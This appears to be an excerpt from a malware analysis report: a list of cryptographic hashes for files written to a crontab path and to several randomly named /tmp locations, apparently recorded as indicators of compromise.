SHA1 6dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256 ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512 be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

/var/spool/cron/crontabs/tmp.ZYRkbG

MD5 91d3f4629a37e2a5d4c358440f1e25e2
SHA1 0d39a4b4512c98a52d7a63dac38d186c532f9b1a
SHA256 d22d1bd124a7ec726152fe30437c7eb22dfa879120ae1bafb7832186adf71cc7
SHA512 cd05c77a522b442924d98727f1e92f508e5b63cafa9d5693556d751d8f9c76c7bfcf84d7d77f07d225c3b215488fe5727bd26bf502331f97ba3ee565afdd2ec9

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

MD5 27a1a1941f224eff6a4babf2495e3692
SHA1 86fae66a698f6280353e470ffadfb64441b03e83
SHA256 ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512 cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

MD5 e9e5d79acad49bbe6c77df0385ec77aa
SHA1 53bbc8b58873cf3117743fab15bd5508421370eb
SHA256 a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512 828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

MD5 8d0f8d45165dc1f3ba334ce75be39621
SHA1 1d5baece9d5af3885276735c3c20d28e161e00ff
SHA256 17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512 a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

MD5 aadb8cc4b6eac7fce760c09262693884
SHA1 b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256 b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA512 5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

MD5 54bec959d900ad930dc662f8092da57d
SHA1 9ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256 b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512 904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

MD5 a7e686eb3f74b104a5520f08cfd54eb5
SHA1 58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256 617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA512 2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

MD5 c97a9c55ddb153e8bfce38f201d2cffb
SHA1 3970452f27327f98c2e3fdcabf0390067b48bd62
SHA256 138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA512 1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

MD5 8fad5e89ce3d2b6159ac2ce2fdf7c084
SHA1 27105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA256 24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA512 71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc